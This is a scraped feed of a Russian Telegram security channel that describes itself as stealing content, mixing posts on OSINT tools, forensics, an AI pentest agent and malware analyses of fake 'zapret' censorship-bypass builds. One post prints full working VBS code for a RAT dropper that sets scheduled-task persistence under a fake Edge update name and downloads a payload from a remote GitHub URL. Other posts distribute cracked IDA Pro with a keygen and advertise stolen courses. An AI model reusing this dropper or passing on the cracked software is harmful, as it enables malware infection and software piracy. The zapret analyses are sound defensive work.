C.I.T. Security
8.96K subscribers
3.12K photos
284 videos
4.3K files
4.44K links
Софт, статьи, книги, базы данных и многое другое. Воруем все самое интересное с просторов телеграма и форумов.

🤵Информационные войны и разведка: @cit_psyop
🧑‍🎓Курсы: @cit_course
🕵️Боты: @citsearch3_bot
@citsearch2bot
Download Telegram
Decepticon — AI-агент для автономного пентеста

Open-source платформа, объединяющая несколько специализированных AI-агентов для проведения разведки, поиска уязвимостей, эксплуатации и постэксплуатации.

Проект использует LangGraph, Neo4j и Docker-окружение с Kali Linux, позволяя автоматизировать сложные сценарии Red Team.

Пока такие системы не заменяют специалистов, но уже показывают, в каком направлении развивается offensive security.

GitHub: https://github.com/PurpleAILAB/Decepticon
❤5
Cybersec.pdf
100.9 KB
Как работает цифровая криминалистика в USA и Европе.

Какие инструменты используются от анализа трафика до мобильных устройств.
❤6
Reverse Engineering & Malware-Analysis Resources


Это, пожалуй, один из лучших репозиториев по:

Reverse Engineering;
Malware Analysis;
Binary Exploitation;
Firmware;
Frida;
Ghidra;
IDA;
Binary Ninja;
eBPF;
ARM.

Это не просто список ссылок, а огромная база инструментов и материалов.

Репозиторий
8❤3
Forwarded from Proxy Bar
IDA pro 9.4
*
Linux + Windows + Mac + ARM
download
*
tree "/home/data/0x01/IDA/IDA pro 9.4/"
/home/reeves/data/soft/IDA/IDA pro 9.4/
├── ida-pro_94_armlinux.run
├── ida-pro_94_armmac.app.zip
├── ida-pro_94_armwin.exe
├── ida-pro_94_x64linux.run
├── ida-pro_94_x64mac.app.zip
├── ida-pro_94_x64win.exe
├── kg_patch
│   ├── idapro.hexlic
│   ├── keygen.js
│   ├── README
│   ├── x64linux
│   │   ├── libida32.so
│   │   └── libida.so
│   └── x64win
│   ├── ida32.dll
│   └── ida.dll
└── misc
├── hexlicsrv94_x64linux.run
├── hexvault94_x64linux.run
├── idapin94.zip
└── lumina94_x64linux.run

5 directories, 17 files
❤9
Interesting RAT delivered via phishing today

The VBS uses heavy string obfuscation before executing a hidden cmd.exe that

- Creates a scheduled task for persistence (every 9 minutes)
- Multi thread cause I am not blueticked 🥳
- Cleaned up VBS screenshot for TLDR
- Downloads GoogleSpace.dat from a GitHub Releases URL
- Saves it as %PUBLIC%\Music\GoogleServices.vbs • Masquerades using a MicrosoftEdgeUpdateTaskMachineCore{GUID} task name

Something tells me it's not Microsoft 🤣
https://github.com/microsoft-services/

Full code:

Dim shell
Dim command

Set shell = CreateObject("WScript.Shell")

command = "cmd /C " & _
"choice /n /c y /d y /t 30 >nul & " & _
"schtasks /create " & _
" /tn ""MicrosoftEdgeUpdateTaskMachineCore{4CL34008-390A-4893-S0C9-C8B34D3846D8}"" " & _
" /tr ""%PUBLIC%\Music\GoogleServices.vbs"" " & _
" /sc minute /mo 9 /f & " & _
"choice /n /c y /d y /t 30 >nul & " & _
"powershell iwr " & _
"'https://github.com/microsoft-services/staff/releases/download/v0.0.3/GoogleSpace.dat'" & _
" -OutFile ""%env:PUBLIC%\Music\GoogleServices.vbs"" & " & _
"choice /n /c y /d y /t 30 >nul & " & _
"exit"

shell.Run command, 0


Use it for educational purpose only
❤9
Face Search Engines

List of 10 reverse image search engines + Artist Ninja reverse image search.

https://www.faceseek.online/blog/best-face-search-engines

https://artist.ninja/reverse-image-search/

#osint #socmint
❤53👍1
Патриоты, тут курсы по всей хуйне заботливо украденные забираем⬇️
https://t.me/cit_course
🔥11🥰6❤4
Forwarded from Vaultsec
C2 Traffic Anomaly Detector.pdf
132.7 KB
C2 Traffic Anomaly Detector

Скрипт продавался за 1200$ а на многих «закрытых форумах» и сейчас продается.

- Анализирует PCAP-файлы (дампы трафика).

- Ищет аномальные DNS-запросы (DGA, длинные поддомены, low TTL).

- Обнаруживает
подозрительные TLS сертификаты (самоподписанные, срок < 7 дней, необычные issuer).

- Выявляет регулярные интервалы между пакетами (beaconing).

- Строит граф связей между внутренними IP и внешними хостами.
❤6
📱 GitHub, ты что творишь? Это рофлс! (или антивирус вам не поможет)

🔐 В начале августа GitHub началась вторая волна банов — бан youtubediscord целиком. Вместе с ней исчезли ZapretGUI, форки Telegram-клиента ZaStoGram, аккаунт censorliber, репозиторий goshkow/Zapret-Hub и весь аккаунт neiroxgod с его zapret-ui. Всё это — открытый код, который можно прочитать глазами.

Репозитории с настоящей малварью. Мы проверили HTTP-коды в тот же день: у чистых проектов 404, у заражённых — 200. И это не пара залётных фейков, а раздачи, которые живут на площадке месяцами и собирают сотни звёзд.

⭐️ "Но ведь звёзды признак безопасности". У репозитория Quantumfirear/zapret-discord-youtube-1-10-0 — 200 звёзд и 51 форк. Звучит солидно, пока не посмотришь на аккаунт: он создан 3 июля 2026 в 13:14:27, а репозиторий появился в 13:16:06. Через одну минуту тридцать девять секунд. Один подписчик. Двести звёзд за месяц на пустом месте — это не популярность, это накрученные отзывы.

🤣 Про историю коммитов. У того же репозитория 12 131 коммит — для честного проекта это годы работы команды. Открываем историю: все коммиты называются «Update README md» и идут с шагом примерно 43 секунды. Вся эта «история» умещается в пять дней конца июля. Скрипт больше суток правил один файл, чтобы счётчик стал четырёхзначным.

💸 Где же вирус, если в папке всё чисто? А он и правда чистый: в bin ровно один winws.exe, WinDivert, ничего лишнего — старый чек-лист такая сборка проходит. Смотри на размер батников. general.bat и service.bat весят по 15,8 МБ вместо обычных трёх килобайт. Внутри — целая программа, записанная буквами в base64, которую скрипт собирает, декодирует штатной утилитой certutil в папку TEMP и запускает. Лишнего .exe нет — он рождается в момент запуска.

💸 "А я хэши проверил всё совпадает с ориг запретом". В одном из архивов заботливо лежит файл SHA256SUMS.txt с суммами всех файлов. Считаем реальную сумму заражённого service.bat — она не совпадает с заявленной. Список просто не обновили после подмены.

🔥 Ещё приём — раздуть архив. Релиз Zapret-4.0 весит 111 МБ, из них 105 МБ занимает папка Depends с «библиотеками» вроде opengl32.dll и avcodec-59.dll. Ни одна из них библиотекой не является — это случайный мусор. Так придают вид серьёзного продукта и заодно мешают быстро проверить файл.

🌟 "Но GitHub же банит вирусы по тегам". В июле подчистили теги dpi-bypass, rkn-bypass, discord-fix. Раздачи дописали к названию год и переехали: в теге zapret-discord-youtube-2026 сейчас 509 репозиториев, в zapret-telegram — 172. Фильтр по слову обходится редактированием одного поля в настройках. Пострадали от него ровно те, кто теги не менял.

💀 Отдельная история — Fixit. Красивый сайт, «доступ к YouTube, Discord и Telegram без VPN», карточка «Стабильность 100 %». Программы за этим нет вообще: внутри архива инструкция, легальный WinRAR, зашифрованный файл и bat, который жертва запускает сама. Ставятся стилер Arcane и майнер Monero. Arcane забирает пароли и куки из браузеров, сессии Telegram и Discord, Steam, криптокошельки и даже пароли твоего Wi-Fi. Домены кампании зарегистрированы 20 и 21 февраля 2026 — это проверяется одной командой whois.

🔍 Что реально работает вместо звёзд: смотри размер .bat-файлов, ищи в них слова certutil и TEMP, сверяй возраст аккаунта с числом звёзд, читай сообщения коммитов, а не их количество, проверяй дату регистрации домена и то, куда ведёт кнопка «Скачать». Если она уходит на сокращатель ссылок или на похожий по написанию домен — дальше можно не разбираться.

🏠 Мы, кстати, поэтому и переехали на свой Forgejo: аккаунт на чужой площадке — не собственность, а разрешение, которое отзывает автоматика без объяснений. ZaStoGram и ZaStoGram_desktop живут на git.zapret.moe и никуда не делись.

В статье — все проверяемые числа, хэши полезной нагрузки, разбор обоих приёмов сокрытия и готовые команды, которыми ты за минуту проверишь любой репозиторий сам. Плюс отдельно: где предупреждению антивируса стоит верить, а где детект означает лишь «RiskTool» на драйвер WinDivert.

☺️ Скачать | ☺️ Premium (донаты) | ☺️ Android, MacOS и др. ссылки
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3
🧻 Обходы блокировок YouTube, Discord (ВПН) | Ютуб и Дискорд не работает, ютуб заблокирован замедлили 2026
📱 GitHub, ты что творишь? Это рофлс! (или антивирус вам не поможет) 🔐 В начале августа GitHub началась вторая волна банов — бан youtubediscord целиком. Вместе с ней исчезли ZapretGUI, форки Telegram-клиента ZaStoGram, аккаунт censorliber, репозиторий goshkow/Zapret…
🔬 Мы залезли внутрь трёх «сборок» и разобрали их по байтам. Главный вопрос был один: почему антивирус молчит, если это троян. Ответ оказался неприятнее, чем «антивирусы плохие».

🤐 Начнём с эксперимента, который ставит точку. Берём файл Zapret-4.0.exe из фейковой сборки и отправляем на VirusTotal. Результат: 51 вендор из 71 называет его трояном. Microsoft, BitDefender, ESET, Kaspersky, CrowdStrike — все видят. А теперь отправляем тот же самый файл, но внутри архива, как его и раздают: 10 из 58. Половина крупных вендоров замолкает.

👀 Файл просто слишком большой. В архиве 106 МБ, из которых 105 — папка Depends с «библиотеками» opengl32.dll, avcodec-59.dll, steam_api64.dll. Ни одна из них библиотекой не является: внутри случайный мусор, а архив собран вообще без сжатия, чтобы не схлопнулся. Это не про солидность — это ширма. У сканеров есть лимиты на размер и время разбора, и стомегабайтный архив в них упирается.

💻 К вредоносным файлам приклеена цифровая подпись Microsoft. Настоящая: цепочка Microsoft Corporation ← Microsoft Code Signing PCA 2024, сертификат действует до апреля 2027. Мы вытащили её и посмотрели, откуда она — внутри осталось имя программы: Microsoft Edge Update. Подпись срезали с компонента обновления браузера Edge и перенесли на свой файл.

🌟 Подпись, конечно, недействительна, и это доказывается арифметикой. В ней зашит хэш подписанного содержимого 36B9623A…, а реальные хэши файлов — 935ff11e… и b7a1f673…. Не сходится. Более того, один и тот же блок подписи приклеен к двум разным файлам — для настоящей подписи это невозможно в принципе.

👻 Так зачем клеить заведомо нерабочую подпись? Затем, что она работает — не как криптография, а как значок доверия. В свойствах файла Windows появляется вкладка «Цифровые подписи» с именем Microsoft Corporation. Чтобы увидеть «подпись недействительна», надо открыть её и вчитаться. Никто не вчитывается.

👩‍💻 И антивирусы, как выяснилось, тоже. В публичном исследовании подписанной малвари не менее 34 защитных продуктов не проверяли валидность сертификата вообще: образцы, которые до этого спокойно детектились, переставали детектиться после простого дописывания невалидной подписи в конец файла.

❤️‍🔥 Второй слой грима — свойства файла. Наш троян представляется так: Организация — Intel Corporation, описание — «System health background task», оригинальное имя — IntelMEService.exe, версия 5.1.41.5927. Эти поля вписывает автор файла, любые. Смотреть на них как на доказательство — то же самое, что верить надписи на футболке.

💻 Теперь почему не помогают сигнатуры. Два образца из разных репозиториев — это одна программа, собранная дважды. Совпадение по коду 97 %. А совпадение по содержимому файла — 1 блок из 2891. Имена функций перемешиваются при каждой сборке, шифрованный блок внутри новый, хэш новый. Защита ищет известный файл, а такого файла больше не существует.

⌨️ Внутри всё зашифровано всерьёз: на мегабайт файла приходится 9 килобайт кода, остальное — блоб с энтропией 7,9998 и шифром ChaCha20. Ни одного адреса сервера, ни одного упоминания браузеров в открытом виде. Зато нашлась строка AmsiScanBuffer, спрятанная простейшим XOR — это функция, через которую Windows даёт антивирусу заглянуть в исполняемый код в памяти. Прятать её имя честной программе незачем.

🤩 И самое коварное: подделка почти целиком состоит из оригинала. В одной сборке 45 файлов из 47 побайтово совпадают с настоящим релизом Flowseal, ядро winws.exe не подменено вообще. Заражены ровно два файла. Смотреть глазами бесполезно — 96 % содержимого честные.

🔪 В другой сборке лежал файл SHA256SUMS.txt, и он оказался настоящим: 41 сумма из 43 сходится, а расхождение приходится ровно на заражённый service.bat. Инструмент проверки лежал прямо в архиве и указывал пальцем на подмену. Им никто не воспользовался.

Продолжение: https://t.me/zapretvirus

☺️ Скачать | ☺️ Premium (донаты) | ☺️ Android, MacOS и др. ссылки
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3👍2
C.I.T. Security pinned Deleted message
Forwarded from C.I.T. Security
Софт, статьи, книги, базы данных и многое другое. Воруем все самое интересное с просторов телеграма и форумов.

🤵Информационные войны и разведка: @cit_psyop
🧑‍🎓Курсы: @cit_course
🕵️Боты: @citsearch3_bot
@citsearch2bot
❤3
Ghostint Tracker — приложение для веб-расследований и картографии OSINT нового поколения. Чтобы централизовать, визуализировать и обогатить ваши запросы, она объединит динамические графические связи (React Flow), синхронную мировую картографию (React-Leaflet) и искусственный гибрид двойного интеллекта (Locale & Avancee).

https://tracker.prohacking77.me/
https://github.com/jollncoelho/Zhetikal_OSINT_tracker
https://www.youtube.com/watch?v=mQl5btUpOwc

📱 Telegram | 🌐 ВК | 📲 MAX
📲 RUTUBE | 🌍 VK Видео
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2
Sherloq — набор инструментов для криминалистической экспертизы цифровых изображений с открытым исходным кодом.

https://github.com/GuidoBartoli/sherloq

📱 Telegram | 🌐 ВК | 📲 MAX
📲 RUTUBE | 🌍 VK Видео
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2
EXTRACTOR.html
58.2 KB
🔎DATA_EXTRACTOR
📝Парсер для извлечения регулярных выражений (номер телефона, email, адрес криптокошелька, никнейм, социальный аккаунт) из загруженного текста.
🖥ALL ⏰️2026/08
#️⃣#PARSER #ALL
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3
🖥 Репозиторий: OSINT Browser Extensions — курируемый каталог браузерных расширений для проведения OSINT-исследований и цифровых расследований

OSINT Browser Extensions — это справочный список полезных плагинов и расширений для веб-браузеров, предназначенный для специалистов по разведке по открытым источникам и аналитиков информационной безопасности.

— В репозитории собраны утилиты, систематизированные по категориям (поиск по изображениям, анализ социальных сетей, извлечение метаданных, работа с веб-архивами и анализ сетевых заголовков), которые помогают упростить и ускорить сбор цифровых следов непосредственно в процессе веб-серфинга.

⏺ Ссылка на GitHub

#OSINT #Browser #Extensions #Recon #Investigation #Awesome | Лаборатория хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2
Большая коллекция OSINT ресурсов (подборки инструментов, сайты с тасками, новостные каналы и блоги, книги, OSINT сообщества и прочее)

https://start.me/p/DPYPMz/the-ultimate-osint-collection
❤2